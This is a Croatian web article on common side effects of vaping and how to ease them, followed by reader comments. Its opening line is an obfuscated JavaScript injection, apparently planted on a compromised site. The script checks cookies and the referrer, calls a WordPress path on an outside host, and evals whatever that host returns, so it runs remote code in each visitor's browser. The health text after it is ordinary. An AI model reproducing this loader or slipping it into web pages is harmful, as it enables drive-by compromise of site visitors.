;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Moguće nuspojave korištenja e-cigarete i kako ih riješiti

E-cigarete, kao i gotovo sve što konzumiramo ili udišemo, mogu imati određene nuspojave kod nekih ljudi. Naravno, zbog velike razlike u uređajima, e-tekućinama i načinu korištenja među ljudima, ove se reakcije mogu razlikovati od osobe do osobe, ali uglavnom se radi o vrlo blagim nuspojavama koje se lako mogu riješiti.

Suha usta

Jedna od najčešćih nuspojava vapinga. Suha usta najviše se povezuje s osnovnim sastojcima e-tekućine: PG i VG (propilen glikol i biljni glicerin).

PG i VG su ovlaživači, zbog čega se koriste u potrošnim proizvodima kako bi zadržale vlažnost; ali su i higroskopni, što znači da upijaju vodu.

Kada imate općenito suha usta, možete koristiti oralno hidratantno sredstvo za ispiranje, koje ironično ima i PG i VG kao sastojke, ili jednostavno možete popiti više vode. Svakako bi bilo dobro da vam pijenje većih količina vode na dnevnoj razini uđe u naviku ako ste vaper.

Ako su vam usta stalno isušena, posavjetujte se sa svojim liječnikom. Kronična suha usta mogu biti simptom dehidracije i mogu uzrokovati ozbiljne komplikacije oralnog zdravlja ako se ne liječe.

Vrtoglavica

Slično kao kad prvi put pušite, nije neuobičajeno osjetiti vrtoglavicu od vapinga.

Također slično pušenju, ovo će se obično prestati pojavljivati ​​nakon nekog vremena korištenja e-cigareta. Ovaj osjećaj ipak nije od vapinga općenito; to je od vapinga nikotina – osobito s visokim sadržajem nikotina.

Ako ste zabrinuti zbog vrtoglavice ili osjećaja vrtoglavice, najbolji način da riješite ovaj problem je smanjiti količinu nikotina ili količinu udahnute pare u kratkim razdobljima. Ako ne želite smanjiti potrošnju, to je nešto što će vjerojatno nestati kako se vaše tijelo navikne na nikotin.

Umor i iscrpljenost

Nikotin je stimulans koji paradoksalno može povećati mentalnu budnost i imati sedativni učinak. Za neke korisnike to je više jedno nego drugo.

Moguće je da ako ste umorni od vapinga, to bi moglo biti slično padu kofeina. Ako često osjećate iscrpljenost pokušajte smanjiti ili povećati razinu nikotina ili ga čak potpuno eliminirati i provjerite ima li razlike.

Bol u grlu

Grlobolju ili grebanje može uzrokovati niz stvari: nikotin, propilen glikol, arome ili čak zavojnica koja se koristi u raspršivaču.

Neke zavojnice koje se koriste u vapingu temelje se na niklu, a nije neuobičajeno da korisnici otkriju da imaju alergiju na ovaj metal.

Također, na internetu se može pronaći nekoliko izvješća koja povezuju grlobolju s visokim sadržajem nikotina, osobito kada se koristi s visokim razinama propilen glikola (50% ili više).

Ako mislite da su ovi problemi povezani s e-tekućinom, pokušajte s većim postotkom VG, novim okusom – poput soka s mentolom – ili snizite koncentraciju nikotina.

Ako ste sigurni da nije tekućina ili nikotin, možda se radi o vrsti žice za vape koja se koristi u vašoj zavojnici. Provjerite specifikacije uređaja i provjerite ima li zavojnicu od nikla ili zavojnicu sa sadržajem nikla kao što je nikrom (često naveden kao Ni80).

Ako niste sigurni od kojeg je materijala vaša zavojnica, zamijenite je onom na kojoj je jasno naznačeno da koristi Kanthal ili nehrđajući čelik – nehrđajući čelik također može sadržavati nikal, ali obično samo do 10%. Ako vam se čini da to ne riješilo upalu grla, dogovorite sastanak sa svojim liječnikom.

Kašalj

Problemi s kašljem tijekom vapinga često se pojavljuju u pritužbama početnika, čak i kada su bivši pušači ili čak sadašnji pušači.

Općenito govoreći, kašalj je posljedica pogrešnog pristupa vapingu i udisanju. Kao rezultat upotrebe visoke razine nikotina s izravnim udisajem u pluća ili pokušaja uvlačenja poput cigarete na uređaju s previše protoka zraka.

Ako kašljete, provjerite na internetu je li vaš uređaj namijenjen za MtL ili DL način parenja, a onda se uvjerite da parite u skladu s time.

Ukoliko koristite sub-ohm atomizere namijenjene cloud chaserima koji rade najveće moguće oblake, preporuča koristiti tekućina s nikotinom od 6 mg/mL ili niže.

Glavobolje

Ako ste nedavno prestali pušiti, nije neuobičajeno da se pojave glavobolje. Iako još uvijek možete dobiti nikotin iz vapea, nikotin nije jedini alkaloid koji se nalazi u duhanu. Alkaloidi imaju fiziološki učinak na korisnika, a prestanak uobičajene upotrebe može uzrokovati glavobolju.

Nikotin je glavni alkaloid u duhanu, koji čini oko 95% sadržaja alkaloida, ali postoje i drugi manji alkaloidi duhana u duhanskom dimu, koji nisu prisutni u e-tekućinama. Ovi alkaloidi s manjim sadržajem duhana djeluju zajedno s nikotinom i vjeruje se da povećavaju potencijalnu ovisnost.

Ako ste nedavno prestali pušiti i parite s nikotinom, moguće je da sam nikotin možda neće biti dovoljan da otkloni glavobolju u početku, a možda se povlačite i od drugih kemikalija i alkaloida koji se nalaze u duhanu.

Ako imate glavobolje, a to nije od prestanka pušenja, moguće je da ste dehidrirani. Glavobolje su čest simptom dehidracije. Ako ste primijetili suha usta u kombinaciji s vašim glavoboljama, lijek bi jednostavno mogao biti da pijete više vode. Ali ako to ne uspije, trebate se posavjetovati s liječnikom.

Gubitak/dobitak na težini

Mnogi smatraju nikotin sredstvom za suzbijanje apetita, koji je inače pojačan kofeinom, ali nema puno uvjerljivih dokaza za njegovu učinkovitost u stvarnom gubitku težine.

Nikotin je stimulans, a drugi slični stimulansi (poput kofeina) povezani su sa sagorijevanjem masti povećanjem brzine metabolizma. Ali sagorijevanje masti i gubitak težine nisu isto. Čak i suzbijanje apetita nije isto što i “gubitak težine”.

Ako slučajno netko doživi neočekivano mršavljenje uz vaping, jednostavnije je objašnjenje da je vaping oralna fiksacija bez kalorija.

Mnogi vaperi smatraju da puffkanje slatkih okusa smanjuje njihovu potrebu za slatkišima. S druge strane, ako prestanete s vapingom, postoji šansa da će se izostanak puffkanja na kraju zamijeniti kalorijama koje bi mogle dovesti do debljanja.

Mučnina

Ako osjećate mučninu od vapinga, to bi moglo biti zbog nikotina. Slično nuspojavama nikotinskih nadomjesnih terapija bez recepta kao što su žvakače gume i flasteri, osjećaj uznemirenog želuca zabilježen je kao uobičajena nuspojava konzumiranja nikotina. Pušači često prijavljuju isto kada su počeli pušiti.

Ako ste primijetili da osjećaj mučnine nije povezan s upotrebom nikotinom, velika je vjerojatnost da je to reakcija na određenu e-tekućinu koju koristite.

Jednostavan lijek je smanjiti potrošnju ili ukloniti vjerojatnog krivca. No, poput osjećaja vrtoglavice i glavobolje zbog upijanja nikotina, gastro problemi se često rješavaju sami od sebe ako si date malo vremena.

Međutim, ako ti problemi ne nestanu ili vam izazivaju veliku nevolju, najbolje je potražiti liječnički savjet.

Bol u prsima

Mogu postojati različiti razlozi za bol u prsima zbog vapinga. Pretjerana toplina, visok nivo nikotina ili možda čak i specifične arome u određenoj e-tekućini mogu biti uzrok.

Neki korisnici na vaping forumima izjavili su da im tekućine s cimetom koje sadrže kemijsku aromu cinamaldehid izazivaju bol u prsima. Bez obzira na uzrok, bol u prsima nije beznačajna stvar i može biti znak ozbiljnijeg zdravstvenog problema.

Ako osjećate bol u prsima i čini se da je posljedica onoga što parite, odmah prestanite s korištenjem e-cigareta! Dajte si vremena, napravite pauzu te ukoliko želite, pokušajte opet nekom drugom prilikom. Tada možda možete smanjiti snagu, smanjiti količinu nikotina, promijeniti raspršivač ili zavojnicu ili promijeniti e-tekućinu. U suštini, pokušajte promijeniti cijelu postavu ako možete.

Ako bol u prsima potraje, potražite liječničku pomoć.

Choose your Reaction!
 • Da.. Bilo je sve ok, koristio sam sve isto do sredine 9mjeseca i onda je pocela bol u prsima.. Pojma nemam sta je, sada vrtim razlicite arome u razlicitw baze, imam za stolom 300 bocica majke mi vise nemam pojma ni u kojoj je sta.. Inace sam pusio saljut s vappori bazom i red wolf nic… Sad kemijam s nik. Soli i neznam vise s cim ne… Umorio sam se vise od svega.. Nezelim se vratiti na gloe eone i ostale pizd….. Hocu vape i amen, naci cu sta nevala.. Btw inace imam astmu

 • Česti uzrok kašlja je i nepravilno postavljen coil u odnosu na rupu za zrak… nekim ljudima paše coil jako blizu otvora za zrak, nekima ako je više… meni osobno ovo drugo. Također, kašalj se može javiti nakon nekog vremena kad se na coilu skupi gunk pa prilikom povlačenja te sitne čestice gunk-a ulaze u grlo i imaju efekt kao papar – grebu i škakljaju (nisu tako opasne kao što je to bio katran od gorenja cigareta, ali treba pripaziti i s time). Ako primjetite sitne crne “točkice” u driptipu, dimnjaku ili pak na vrhu komore tanka – vrijeme je za novi coil (ili bar probajte to počistiti maramicom/salvetom ako je moguće)

 • Suha usta – jedino ovo mi se događa, ali se zato uvijek nešto pijucka dok se vejpa.
  Vrtoglavica – nope.
  Umor i iscrpljenost – naprotiv, otkako sam počeo vejpati, imam osjećaj da imam više energije i to u značajnoj mjeri više nego kad sam bio na cigaretama.
  Bol u grlu – nope.
  Kašalj – naprotiv, kašljao “kao konj” dok sam bio na cigaretama, sad se rijetko kad zakašljem, skoro pa nikad..
  Glavobolje – nope. Vjerovatno jer je glava prazna, pa me nema što boljeti :P
  Gubitak/dobitak na težini – nope. Vepar bio, vepar ostao :D
  Mučnina – nope.
  Bol u prsima – nope.

  Dragi Lastane, jesam li ja normalan ili me treba pod hitno sankcionirati u nekom sanatorijumu? :P :D

 • Super clanak! Iskusila sam suha usta od previše PG-a i bila je mini drama s Ni80, kad sam kao rta početnica mislila da kašljem jer ne znam dobro složit atty. Tuka zaboravila da nikal ne smijem ni pogledat 🤣

 • Meni se samo desilo da odjednom,kod vejpanja, više nikakav okus nisam osjetila. Tad sam ovdje pročitala da je to nešto što se zove vaperski jezik. Samo sam počela piti više vode i to je prošlo. Ostale nuspojave nisam imala

Leave a Comment